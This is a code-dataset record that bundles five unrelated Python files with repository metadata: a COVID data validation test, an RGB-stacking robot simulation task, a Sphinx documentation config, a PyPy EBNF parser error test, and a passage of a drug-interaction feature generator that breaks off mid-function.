1ef362e1d63e3c9c5fed6b83dc03815cab1fdee6
| 4,114
|
py
|
Python
|
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
import logging
import pytest
import pandas as pd
from libs.datasets import JHUDataset
from libs.datasets import CDSDataset
from libs.datasets import dataset_utils
from libs.datasets import custom_aggregations
from libs.datasets.dataset_utils import AggregationLevel
from libs import CovidDatasets
_logger = logging.getLogger(__name__)
@pytest.mark.skip
@pytest.mark.parametrize(
"test_missing,test_matching",
[(True, True)]
)
@pytest.mark.parametrize(
"legacy_cls,new_cls",
[(CovidDatasets.JHUDataset, JHUDataset), (CovidDatasets.CDSDataset, CDSDataset),],
)
def test_missing_state_in_generic_dataset(legacy_cls, new_cls, test_matching, test_missing):
if test_matching:
test_type = "values match"
elif test_missing:
test_type = "values are both included"
print(f"Running on {legacy_cls} checking that {test_type}")
legacy_jhu = legacy_cls()
jhu = new_cls.local().timeseries().get_subset(None, after="2020-03-02")
new = jhu.get_subset(AggregationLevel.STATE, country="USA")
new.latest_values(AggregationLevel.STATE)
state_groupby = ["country", "date", "state"]
not_matching_states = []
missing_states = []
for state in new.states:
if len(state) > 2:
# Some of the states have weird data (i.e. cruise ship), skipping
continue
try:
old_timeseries = legacy_jhu.get_timeseries_by_country_state(
"USA", state, 4
)
except Exception:
print(f"missing data for old timeseries: {state}")
new_timeseries = new.get_data(state=state)
# New data does not contain synthetics.
non_synthetic = old_timeseries[old_timeseries.synthetic.isnull()]
comparison_result = dataset_utils.compare_datasets(
non_synthetic,
new_timeseries,
state_groupby,
first_name="old",
other_name="new",
)
all_combined, matching, not_matching, missing = comparison_result
if test_matching and len(not_matching):
not_matching_states.append((state, not_matching))
if test_missing and len(missing):
missing_states.append((state, missing))
if not_matching_states:
for state, data in not_matching_states:
print(state)
print(data)
if missing_states:
for state, data in missing_states:
print(state)
print(data)
if not_matching_states or missing_states:
assert False
def default_timeseries_row(**updates):
data = {
'fips': '22083',
'aggregate_level': 'county',
'date': '2020-03-26 00:00:00',
'country': 'USA',
'state': 'NY',
'cases': 10.0,
'deaths': 1.0,
'recovered': 0.0,
'source': 'JHU',
'generated': False,
'county': 'Richland Parish'
}
data.update(updates)
return data
@pytest.mark.parametrize("are_boroughs_zero", [True, False])
def test_nyc_aggregation(are_boroughs_zero):
nyc_county_fips = custom_aggregations.NEW_YORK_COUNTY_FIPS
nyc_borough_fips = custom_aggregations.NYC_BOROUGH_FIPS[0]
nyc_cases = 10
borough_cases = 0 if are_boroughs_zero else 10
rows = [
default_timeseries_row(fips=nyc_county_fips, cases=nyc_cases),
default_timeseries_row(
fips=nyc_borough_fips, cases=borough_cases, deaths=borough_cases, recovered=borough_cases
),
default_timeseries_row()
]
df = pd.DataFrame(rows)
# Todo: figure out a better way to define these groups.
group = [
'date', 'source', 'country', 'aggregate_level', 'state', 'generated'
]
result = custom_aggregations.update_with_combined_new_york_counties(
df, group, are_boroughs_zero=are_boroughs_zero
)
results = result.sort_values('fips').to_dict(orient='records')
assert len(results) == 2
nyc_result = results[1]
if are_boroughs_zero:
assert nyc_result['cases'] == nyc_cases
else:
assert nyc_result['cases'] == nyc_cases + borough_cases
| 31.166667
| 101
| 0.660914
|
83f947937c3309597f6ba452452437c2eb3dad8e
| 13,657
|
py
|
Python
|
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | 1
|
2021-10-13T11:51:01.000Z
|
2021-10-13T11:51:01.000Z
|
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | null | null | null |
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A module for constructing the RGB stacking task.
This file builds the composer task containing a single sawyer robot facing
3 objects: a red, a green and a blue one.
We define:
- All the simulation objects, robot, basket, objects.
- The sensors to measure the state of the environment.
- The effector to control the robot.
- The initialization logic.
On top of this we can build a MoMa subtask environment. In this subtask
environment we will decide what the reward will be and what observations are
exposed. Thus allowing us to change the goal without changing this environment.
"""
from typing import Sequence
from dm_control import composer
from dm_control.composer.variation import distributions
from dm_control.composer.variation import rotations
from dm_robotics.geometry import pose_distribution
from dm_robotics.manipulation.props.rgb_objects import rgb_object
from dm_robotics.manipulation.standard_cell import rgb_basket
from dm_robotics.moma import base_task
from dm_robotics.moma import entity_initializer
from dm_robotics.moma import prop
from dm_robotics.moma import robot as moma_robot
from dm_robotics.moma.effectors import arm_effector as arm_effector_module
from dm_robotics.moma.effectors import cartesian_4d_velocity_effector
from dm_robotics.moma.effectors import cartesian_6d_velocity_effector
from dm_robotics.moma.effectors import default_gripper_effector
from dm_robotics.moma.effectors import min_max_effector
from dm_robotics.moma.models.arenas import empty
from dm_robotics.moma.models.end_effectors.robot_hands import robotiq_2f85
from dm_robotics.moma.models.end_effectors.wrist_sensors import robotiq_fts300
from dm_robotics.moma.models.robots.robot_arms import sawyer
from dm_robotics.moma.models.robots.robot_arms import sawyer_constants
from dm_robotics.moma.sensors import action_sensor
from dm_robotics.moma.sensors import camera_sensor
from dm_robotics.moma.sensors import prop_pose_sensor
from dm_robotics.moma.sensors import robot_arm_sensor
from dm_robotics.moma.sensors import robot_tcp_sensor
from dm_robotics.moma.sensors import robot_wrist_ft_sensor
from dm_robotics.moma.sensors import robotiq_gripper_sensor
from dm_robotics.moma.sensors import site_sensor
import numpy as np
# Margin from the joint limits at which to stop the Z rotation when using 4D
# control. Values chosen to match the existing PyRobot-based environments.
_WRIST_JOINT_LIMIT_MARGIN = 0.4
WRIST_RANGE = (
sawyer_constants.JOINT_LIMITS['min'][-1] + _WRIST_JOINT_LIMIT_MARGIN,
sawyer_constants.JOINT_LIMITS['min'][-1] - _WRIST_JOINT_LIMIT_MARGIN)
# Position of the basket relative to the attachment point of the robot.
_DEFAULT_BASKET_CENTER = (0.6, 0.)
DEFAULT_BASKET_HEIGHT = 0.0498
_BASKET_ORIGIN = _DEFAULT_BASKET_CENTER + (DEFAULT_BASKET_HEIGHT,)
WORKSPACE_CENTER = np.array(_DEFAULT_BASKET_CENTER + (0.1698,))
WORKSPACE_SIZE = np.array([0.25, 0.25, 0.2])
# Maximum linear and angular velocity of the robot's TCP.
_MAX_LIN_VEL = 0.07
_MAX_ANG_VEL = 1.0
# Limits of the distributions used to sample initial positions (X, Y, Z in [m])
# for props in the basket.
_PROP_MIN_POSITION_BOUNDS = [0.50, -0.10, 0.12]
_PROP_MAX_POSITION_BOUNDS = [0.70, 0.10, 0.12]
# Limits of the distributions used to sample initial position for TCP.
_TCP_MIN_POSE_BOUNDS = [0.5, -0.14, 0.22, np.pi, 0, -np.pi / 4]
_TCP_MAX_POSE_BOUNDS = [0.7, 0.14, 0.43, np.pi, 0, np.pi / 4]
# Control timestep exposed to the agent.
_CONTROL_TIMESTEP = 0.05
# Joint state used for the nullspace.
_NULLSPACE_JOINT_STATE = [
0.0, -0.5186220703125, -0.529384765625, 1.220857421875, 0.40857421875,
1.07831640625, 0.0]
# Joint velocity magnitude limits from the Sawyer URDF.
_JOINT_VEL_LIMITS = sawyer_constants.VELOCITY_LIMITS['max']
# Identifier for the cameras. The key is the name used for the MoMa camera
# sensor and the value corresponds to the identifier of that camera in the
# mjcf model.
_CAMERA_IDENTIFIERS = {'basket_back_left': 'base/basket_back_left',
'basket_front_left': 'base/basket_front_left',
'basket_front_right': 'base/basket_front_right'}
# Configuration of the MuJoCo cameras.
_CAMERA_CONFIG = camera_sensor.CameraConfig(
width=128,
height=128,
fovy=30.,
has_rgb=True,
has_depth=False,
)
def rgb_task(red_obj_id: str,
green_obj_id: str,
blue_obj_id: str) -> base_task.BaseTask:
"""Builds a BaseTask and all dependencies.
Args:
red_obj_id: The RGB object ID that corresponds to the red object. More
information on this can be found in the RGB Objects file.
green_obj_id: See `red_obj_id`
blue_obj_id: See `red_obj_id`
Returns:
The modular manipulation (MoMa) base task for the RGB stacking environment.
A robot is placed in front of a basket containing 3 objects: a red, a green
and blue one.
"""
# Build the composer scene.
arena = _arena()
_workspace(arena)
robot = _sawyer_robot(robot_name='robot0')
arena.attach(robot.arm)
# We add a camera with a good point of view for capturing videos.
pos = '1.4 0.0 0.45'
quat = '0.541 0.455 0.456 0.541'
name = 'main_camera'
fovy = '45'
arena.mjcf_model.worldbody.add(
'camera', name=name, pos=pos, quat=quat, fovy=fovy)
props = _props(red_obj_id, green_obj_id, blue_obj_id)
for p in props:
frame = arena.add_free_entity(p)
p.set_freejoint(frame.freejoint)
# Add in the MoMa sensor to get observations from the environment.
extra_sensors = prop_pose_sensor.build_prop_pose_sensors(props)
camera_configurations = {
name: _CAMERA_CONFIG for name in _CAMERA_IDENTIFIERS.keys()}
extra_sensors.extend(
camera_sensor.build_camera_sensors(
camera_configurations, arena.mjcf_model, _CAMERA_IDENTIFIERS))
# Initializers to place the TCP and the props in the basket.
dynamic_initializer = entity_initializer.TaskEntitiesInitializer(
[_gripper_initializer(robot), _prop_initializers(props)])
moma_task = base_task.BaseTask(
task_name='rgb_stacking',
arena=arena,
robots=[robot],
props=props,
extra_sensors=extra_sensors,
extra_effectors=[],
scene_initializer=lambda _: None,
episode_initializer=dynamic_initializer,
control_timestep=_CONTROL_TIMESTEP)
return moma_task
def _workspace(arena: composer.Arena) -> rgb_basket.RGBBasket:
"""Returns the basket used in the single panda environment."""
workspace = rgb_basket.RGBBasket()
attachment_site = arena.mjcf_model.worldbody.add(
'site', pos=_BASKET_ORIGIN, rgba='0 0 0 0', size='0.01')
arena.attach(workspace, attachment_site)
return workspace
def _gripper_initializer(
robot: moma_robot.Robot) -> entity_initializer.PoseInitializer:
"""Populates components with gripper initializers."""
gripper_pose_dist = pose_distribution.UniformPoseDistribution(
min_pose_bounds=_TCP_MIN_POSE_BOUNDS,
max_pose_bounds=_TCP_MAX_POSE_BOUNDS)
return entity_initializer.PoseInitializer(robot.position_gripper,
gripper_pose_dist.sample_pose)
def _prop_initializers(
props: Sequence[prop.Prop]) -> entity_initializer.PropPlacer:
"""Populates components with prop pose initializers."""
prop_position = distributions.Uniform(_PROP_MIN_POSITION_BOUNDS,
_PROP_MAX_POSITION_BOUNDS)
prop_quaternion = rotations.UniformQuaternion()
return entity_initializer.PropPlacer(
props=props,
position=prop_position,
quaternion=prop_quaternion,
settle_physics=True)
def _arena() -> composer.Arena:
"""Builds an arena Entity."""
arena = empty.Arena()
arena.mjcf_model.size.nconmax = 5000
arena.mjcf_model.size.njmax = 5000
return arena
def _sawyer_robot(robot_name: str) -> moma_robot.Robot:
"""Returns a Sawyer robot with all the sensors and effectors."""
arm = sawyer.Sawyer(
name=robot_name, actuation=sawyer_constants.Actuation.INTEGRATED_VELOCITY)
gripper = robotiq_2f85.Robotiq2F85()
wrist_ft = robotiq_fts300.RobotiqFTS300()
wrist_cameras = []
# Compose the robot after its model components are constructed. This should
# usually be done early on as some Effectors (and possibly Sensors) can only
# be constructed after the robot components have been composed.
moma_robot.standard_compose(
arm=arm, gripper=gripper, wrist_ft=wrist_ft, wrist_cameras=wrist_cameras)
# We need to measure the last action sent to the robot and the gripper.
arm_effector, arm_action_sensor = action_sensor.create_sensed_effector(
arm_effector_module.ArmEffector(
arm=arm, action_range_override=None, robot_name=robot_name))
# Effector used for the gripper. The gripper is controlled by applying the
# min or max command, this allows the agent to quicky learn how to grasp
# instead of learning how to close the gripper first.
gripper_effector, gripper_action_sensor = action_sensor.create_sensed_effector(
default_gripper_effector.DefaultGripperEffector(gripper, robot_name))
# Enable bang bang control for the gripper, this allows the agent to close and
# open the gripper faster.
gripper_effector = min_max_effector.MinMaxEffector(
base_effector=gripper_effector)
# Build the 4D cartesian controller, we use a 6D cartesian effector under the
# hood.
effector_model = cartesian_6d_velocity_effector.ModelParams(
element=arm.wrist_site, joints=arm.joints)
effector_control = cartesian_6d_velocity_effector.ControlParams(
control_timestep_seconds=_CONTROL_TIMESTEP,
max_lin_vel=_MAX_LIN_VEL,
max_rot_vel=_MAX_ANG_VEL,
joint_velocity_limits=np.array(_JOINT_VEL_LIMITS),
nullspace_gain=0.025,
nullspace_joint_position_reference=np.array(_NULLSPACE_JOINT_STATE),
regularization_weight=1e-2,
enable_joint_position_limits=True,
minimum_distance_from_joint_position_limit=0.01,
joint_position_limit_velocity_scale=0.95,
max_cartesian_velocity_control_iterations=300,
max_nullspace_control_iterations=300)
# Don't activate collision avoidance because we are restricted to the virtual
# workspace in the center of the basket.
cart_effector_6d = cartesian_6d_velocity_effector.Cartesian6dVelocityEffector(
robot_name=robot_name,
joint_velocity_effector=arm_effector,
model_params=effector_model,
control_params=effector_control)
cart_effector_4d = cartesian_4d_velocity_effector.Cartesian4dVelocityEffector(
effector_6d=cart_effector_6d,
element=arm.wrist_site,
effector_prefix=f'{robot_name}_cart_4d_vel')
# Constrain the workspace of the robot.
cart_effector_4d = cartesian_4d_velocity_effector.limit_to_workspace(
cartesian_effector=cart_effector_4d,
element=gripper.tool_center_point,
min_workspace_limits=WORKSPACE_CENTER - WORKSPACE_SIZE / 2,
max_workspace_limits=WORKSPACE_CENTER + WORKSPACE_SIZE / 2,
wrist_joint=arm.joints[-1],
wrist_limits=WRIST_RANGE,
reverse_wrist_range=True)
robot_sensors = []
# Sensor for the joint states (torques, velocities and angles).
robot_sensors.append(robot_arm_sensor.RobotArmSensor(
arm=arm, name=f'{robot_name}_arm', have_torque_sensors=True))
# Sensor for the cartesian pose of the tcp site.
robot_sensors.append(robot_tcp_sensor.RobotTCPSensor(
gripper=gripper, name=robot_name))
# Sensor for cartesian pose of the wrist site.
robot_sensors.append(site_sensor.SiteSensor(
site=arm.wrist_site, name=f'{robot_name}_wrist_site'))
# Sensor to measure the state of the gripper (position, velocity and grasp).
robot_sensors.append(robotiq_gripper_sensor.RobotiqGripperSensor(
gripper=gripper, name=f'{robot_name}_gripper'))
# Sensor for the wrench measured at the wrist sensor.
robot_sensors.append(robot_wrist_ft_sensor.RobotWristFTSensor(
wrist_ft_sensor=wrist_ft, name=f'{robot_name}_wrist'))
# Sensors to measure the last action sent to the arm joints and the gripper
# actuator.
robot_sensors.extend([arm_action_sensor, gripper_action_sensor])
return moma_robot.StandardRobot(
arm=arm,
arm_base_site_name='base_site',
gripper=gripper,
robot_sensors=robot_sensors,
wrist_cameras=wrist_cameras,
arm_effector=cart_effector_4d,
gripper_effector=gripper_effector,
wrist_ft=wrist_ft,
name=robot_name)
def _props(red: str, green: str, blue: str) -> Sequence[prop.Prop]:
"""Build task props."""
objects = ((red, 'red'), (green, 'green'), (blue, 'blue'))
color_set = [
[1, 0, 0, 1],
[0, 1, 0, 1],
[0, 0, 1, 1],
]
props = []
for i, (obj_id, color) in enumerate(objects):
p = rgb_object.RgbObjectProp(
obj_id=obj_id, color=color_set[i], name=f'rgb_object_{color}')
p = prop.WrapperProp(wrapped_entity=p, name=f'rgb_object_{color}')
props.append(p)
return props
| 38.908832
| 81
| 0.755144
|
961d37a7997dab4da3dd3d59d297c6b8352a78c7
| 8,770
|
py
|
Python
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 2
|
2019-01-21T06:33:44.000Z
|
2019-06-19T09:29:46.000Z
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 28
|
2018-07-12T14:02:38.000Z
|
2021-12-15T18:27:38.000Z
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 7
|
2017-11-29T14:19:03.000Z
|
2021-07-13T20:29:21.000Z
|
# -*- coding: utf-8 -*-
#
# BMO documentation build configuration file, created by
# sphinx-quickstart on Fri May 5 01:30:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
from pkg_resources import parse_version
try:
from tree import __version__
except ModuleNotFoundError:
from sdsstools import get_package_version
__version__ = get_package_version(__file__, 'sdss-tree') or 'dev'
# add a local path to the Sphinx search path
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.autosummary',
'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.mathjax',
'sphinx.ext.intersphinx', 'tree.misc.docutree', 'recommonmark', 'sphinxarg.ext',
'sphinx_issues']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'tree'
copyright = '{0}, {1}'.format('2017', 'Brian Cherinka')
author = 'Brian Cherinka'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = parse_version(__version__).base_version
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'py:obj'
issues_github_path = "sdss/tree"
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Intersphinx mappings
intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None),
'astropy': ('http://docs.astropy.org/en/latest', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)}
autodoc_mock_imports = ['_tkinter']
autodoc_member_order = 'groupwise'
napoleon_use_rtype = False
napoleon_use_ivar = True
rst_epilog = """
.. |numpy_array| replace:: Numpy array
.. |HDUList| replace:: :class:`~astropy.io.fits.HDUList`
"""
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bootstrap'
html_sidebars = {}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "SDSS: Tree",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "Page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "paper",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_favicon = './_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_sidebars = {'**': ['localtoc.html']}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = '{0}pdoc'.format('tree')
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '{0}.tex'.format(project), u'{0} Documentation'.format(project),
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tree', u'{0} Documentation'.format(project),
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, project, u'{0} Documentation'.format(project),
author, project, 'One line description of project.',
'Miscellaneous'),
]
| 32.60223
| 94
| 0.675143
|
9acbea5e32723f67d514e711311e4dd2030751b2
| 1,769
|
py
|
Python
|
pypy/rlib/parsing/test/test_parseerrors.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/rlib/parsing/test/test_parseerrors.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/rlib/parsing/test/test_parseerrors.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
import py
from pypy.rlib.parsing.parsing import PackratParser, Rule, Nonterminal
from pypy.rlib.parsing.parsing import Symbol, ParseError
from pypy.rlib.parsing.ebnfparse import parse_ebnf, make_parse_function
from pypy.rlib.parsing.deterministic import LexerError
from pypy.rlib.parsing.tree import RPythonVisitor
class TestDictError(object):
dictebnf = """
QUOTED_STRING: "'[^\\']*'";
IGNORE: " |\n";
data: <dict> | <QUOTED_STRING> | <list>;
dict: ["{"] (dictentry [","])* dictentry ["}"];
dictentry: QUOTED_STRING [":"] data;
list: ["["] (data [","])* data ["]"];
"""
def setup_class(cls):
regexs, rules, ToAST = parse_ebnf(cls.dictebnf)
cls.ToAST = ToAST
parse = make_parse_function(regexs, rules, eof=True)
cls.parse = staticmethod(parse)
def test_lexererror(self):
excinfo = py.test.raises(LexerError, self.parse, """
{
'type': 'SCRIPT',$#
'funDecls': '',
'length': '1',
}""")
msg = excinfo.value.nice_error_message("<stdin>")
print msg
assert msg == """\
File <stdin>, line 2
'type': 'SCRIPT',$#
^
LexerError"""
def test_parseerror(self):
source = """
{
'type': 'SCRIPT',
'funDecls': '',
'length':: '1',
}"""
excinfo = py.test.raises(ParseError, self.parse, source)
error = excinfo.value.errorinformation
source_pos = excinfo.value.source_pos
assert source_pos.lineno == 4
assert source_pos.columnno == 13
msg = excinfo.value.nice_error_message("<stdin>", source)
print msg
assert msg == """\
File <stdin>, line 4
'length':: '1',
^
ParseError: expected '{', 'QUOTED_STRING' or '['"""
| 30.5
| 71
| 0.588468
|
7bc22d292f7a47d0283dfe9403571bc8abea8f70
| 5,621
|
py
|
Python
|
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | null | null | null |
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | null | null | null |
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | 1
|
2020-01-21T19:55:24.000Z
|
2020-01-21T19:55:24.000Z
|
import rdkit as rd
from rdkit import Chem
#from rdkit.Chem import AllChem
#import numpy as np
from collections import Counter
from gensim.models import word2vec
from mol2vec_utils import *
# File to generate numerical features from smiles data and replace
# interaction labels by numerical ones
#
def smiles_to_ECFP(smiles, model = None, fp_radius = 2):
'''Convert a SMILES representation to ECFP representation.
Args :
smiles (str): SMILES representation.
fp_radius (int): Radius for which the Morgan fingerprint is to be computed.
Returns :
fparr (numpy.ndarray): Morgan fingerprint in the form of a NumPy array.
Returns None if smiles is None or not readable.
'''
if smiles is not None:
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
fp = AllChem.GetMorganFingerprintAsBitVect(mol, fp_radius)
else:
return None
fparr = np.zeros((1,))
rd.DataStructs.ConvertToNumpyArray(fp, fparr)
else:
return None
fparr = fparr.astype('B') # Convert to byte to save memory
return fparr
def smiles_to_mol2vec_vector(smiles, model, fp_radius = 2, uncommon = None):
'''Convert a SMILES string to a Mol2Vec vector
'''
if uncommon:
try:
model[uncommon]
except KeyError:
raise KeyError('Selected word for uncommon: %s not in vocabulary' % uncommon)
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
sentence = mol2alt_sentence(mol, fp_radius)
vec = sentence2vec(sentence, model, unseen = uncommon)
if vec.shape == (300,):
return vec
else:
return None
else:
return None
def featurize_smiles_and_interactions(relation_list, smiles_feature_generator,\
smiles_dict, label_map):
'''Generate numerical features from smiles data and label interactions.
The dictionary smiles_dict is used to find the SMILES representations of
drugs found in relation_list. The function smiles_feature_generator
is then applied to these SMILES representations to generate features to
train the model. The dictionary label_map is used to convert the interaction
keywords in relation_list to numerical labels.
Args :
relation_list (list): List of Relation instances
smiles_feature_generator (function): Function that maps a SMILES string
to some kind of numerical feature.
smiles_dict (dict): Dictionary mapping drug names to SMILES strings.
label_map (dict): Dictionary mapping interaction keywords to
numerical labels.
Returns :
smiles_feature_list (list): List of features converted from SMILES strings.
interaction_label_list (list): List of interaction labels that will be the
target for classification.
drug_pair_list (list): List of pairs of drug names for later reference.
'''
feature_dict = {}
smiles_feature_list = []
interaction_label_list = []
drug_pair_list = []
if smiles_feature_generator == smiles_to_mol2vec_vector:
model = word2vec.Word2Vec.load('model_300dim.pkl')
else:
model = None
for relation in relation_list:
sub, obj, interaction = relation.get()
sub_smiles, obj_smiles = smiles_dict[sub], smiles_dict[obj]
if sub_smiles not in feature_dict:
feature_dict[sub_smiles] = smiles_feature_generator(sub_smiles, model = model)
sub_feature = feature_dict[sub_smiles]
if obj_smiles not in feature_dict:
feature_dict[obj_smiles] = smiles_feature_generator(obj_smiles, model = model)
obj_feature = feature_dict[obj_smiles]
interaction_label = label_map[interaction]
if sub_feature is not None and obj_feature is not None:
smiles_feature_list.append(np.concatenate((sub_feature, obj_feature)))
interaction_label_list.append(interaction_label)
drug_pair_list.append((sub, obj))
return smiles_feature_list, interaction_label_list, drug_pair_list
def filter_less_frequent_labels(smiles_feature_list, interaction_label_list,\
drug_pair_list, cutoff_freq):
'''Filters out labels that appear below a certain frequency.
Args :
smiles_feature_list (list): List of numerical features (obtained from SMILES strings).
interaction_label_list (list): List of numerical labels that are the target for
classification.
drug_pair_list (list): List of pairs of drug names.
cutoff_freq (list): Only interactions labels that appear above this number are kept.
Returns :
smiles_feature_list (list): Filtered list of features.
interaction_label_list (list): Filtered list of interaction labels.
drug_pair_list (list): Filtered list of pairs of drug names.
'''
assert(len(smiles_feature_list) == len(interaction_label_list))
assert(len(drug_pair_list) == len(interaction_label_list))
label_freq = Counter()
for label in interaction_label_list:
label_freq[label] += 1
filter_count = 0
index = 0
while index < len(smiles_feature_list):
if label_freq[interaction_label_list[index]] < cutoff_freq:
del smiles_feature_list[index]
del interaction_label_list[index]
